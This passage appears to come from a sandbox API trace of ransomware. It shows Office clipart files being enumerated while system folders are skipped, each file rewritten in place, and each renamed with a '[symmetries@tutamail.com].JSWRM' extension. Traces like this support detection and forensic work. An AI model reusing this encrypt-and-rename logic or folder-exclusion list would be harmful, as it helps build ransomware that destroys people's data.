cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.699] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3494) returned 1 [0075.699] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xda0) returned 0x24c1d0 [0075.699] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xda0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xda0, lpOverlapped=0x0) returned 1 [0075.700] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.700] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xda0, lpOverlapped=0x0) returned 1 [0075.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.700] CloseHandle (hObject=0x460) returned 1 [0075.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0075.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0075.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0075.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0075.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0075.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0075.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0075.701] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01634_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01634_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0075.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.701] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3a94, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS01635_.WMF", cAlternateFileName="")) returned 1 [0075.702] lstrcmpiW (lpString1="BS01635_.WMF", lpString2=".") returned 1 [0075.702] lstrcmpiW (lpString1="BS01635_.WMF", lpString2="..") returned 1 [0075.702] lstrcmpiW (lpString1="BS01635_.WMF", lpString2="...") returned 1 [0075.702] lstrcmpiW (lpString1="BS01635_.WMF", lpString2="windows") returned -1 [0075.702] lstrcmpiW (lpString1="BS01635_.WMF", lpString2="recovery") returned -1 [0075.702] lstrcmpiW (lpString1="BS01635_.WMF", lpString2="perflogs") returned -1 [0075.702] lstrcmpiW (lpString1="BS01635_.WMF", lpString2="documents and settings") returned -1 [0075.702] lstrcmpiW (lpString1="BS01635_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.702] lstrcmpiW (lpString1="BS01635_.WMF", lpString2="system volume information") returned -1 [0075.702] lstrcmpiW (lpString1="BS01635_.WMF", lpString2="msocache") returned -1 [0075.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0075.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01635_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01635_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS01635_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0075.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0075.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01635_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01635_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS01635_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0075.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.702] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.702] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.702] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.703] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14996) returned 1 [0075.703] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3a90) returned 0x24c1d0 [0075.703] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3a90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x3a90, lpOverlapped=0x0) returned 1 [0075.705] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.705] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3a90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x3a90, lpOverlapped=0x0) returned 1 [0075.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.706] CloseHandle (hObject=0x460) returned 1 [0075.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0075.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0075.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0075.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0075.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0075.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.706] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01635_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01635_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0075.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.707] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.707] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x752, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS01636_.WMF", cAlternateFileName="")) returned 1 [0075.707] lstrcmpiW (lpString1="BS01636_.WMF", lpString2=".") returned 1 [0075.707] lstrcmpiW (lpString1="BS01636_.WMF", lpString2="..") returned 1 [0075.707] lstrcmpiW (lpString1="BS01636_.WMF", lpString2="...") returned 1 [0075.707] lstrcmpiW (lpString1="BS01636_.WMF", lpString2="windows") returned -1 [0075.707] lstrcmpiW (lpString1="BS01636_.WMF", lpString2="recovery") returned -1 [0075.707] lstrcmpiW (lpString1="BS01636_.WMF", lpString2="perflogs") returned -1 [0075.707] lstrcmpiW (lpString1="BS01636_.WMF", lpString2="documents and settings") returned -1 [0075.707] lstrcmpiW (lpString1="BS01636_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.708] lstrcmpiW (lpString1="BS01636_.WMF", lpString2="system volume information") returned -1 [0075.708] lstrcmpiW (lpString1="BS01636_.WMF", lpString2="msocache") returned -1 [0075.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0075.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01636_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01636_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS01636_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0075.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0075.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01636_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01636_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS01636_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0075.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.708] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.708] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.708] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1874) returned 1 [0075.708] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.708] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x750) returned 0x23fc98 [0075.708] ReadFile (in: hFile=0x460, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0x750, lpOverlapped=0x0) returned 1 [0075.710] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.710] WriteFile (in: hFile=0x460, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0x750, lpOverlapped=0x0) returned 1 [0075.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0075.710] CloseHandle (hObject=0x460) returned 1 [0075.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0075.710] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0075.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0075.710] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0075.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0075.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.710] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01636_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01636_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0075.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.711] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6f8253, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6f8253, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf6c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BS01637_.WMF", cAlternateFileName="")) returned 1 [0075.711] lstrcmpiW (lpString1="BS01637_.WMF", lpString2=".") returned 1 [0075.711] lstrcmpiW (lpString1="BS01637_.WMF", lpString2="..") returned 1 [0075.711] lstrcmpiW (lpString1="BS01637_.WMF", lpString2="...") returned 1 [0075.711] lstrcmpiW (lpString1="BS01637_.WMF", lpString2="windows") returned -1 [0075.711] lstrcmpiW (lpString1="BS01637_.WMF", lpString2="recovery") returned -1 [0075.711] lstrcmpiW (lpString1="BS01637_.WMF", lpString2="perflogs") returned -1 [0075.711] lstrcmpiW (lpString1="BS01637_.WMF", lpString2="documents and settings") returned -1 [0075.711] lstrcmpiW (lpString1="BS01637_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.711] lstrcmpiW (lpString1="BS01637_.WMF", lpString2="system volume information") returned -1 [0075.711] lstrcmpiW (lpString1="BS01637_.WMF", lpString2="msocache") returned -1 [0075.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0075.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01637_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01637_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS01637_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0075.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0075.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01637_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS01637_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS01637_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0075.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.712] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.712] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.773] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3948) returned 1 [0075.773] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.773] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf60) returned 0x24c1d0 [0075.773] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xf60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xf60, lpOverlapped=0x0) returned 1 [0075.782] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.782] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xf60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xf60, lpOverlapped=0x0) returned 1 [0075.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.782] CloseHandle (hObject=0x460) returned 1 [0075.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: 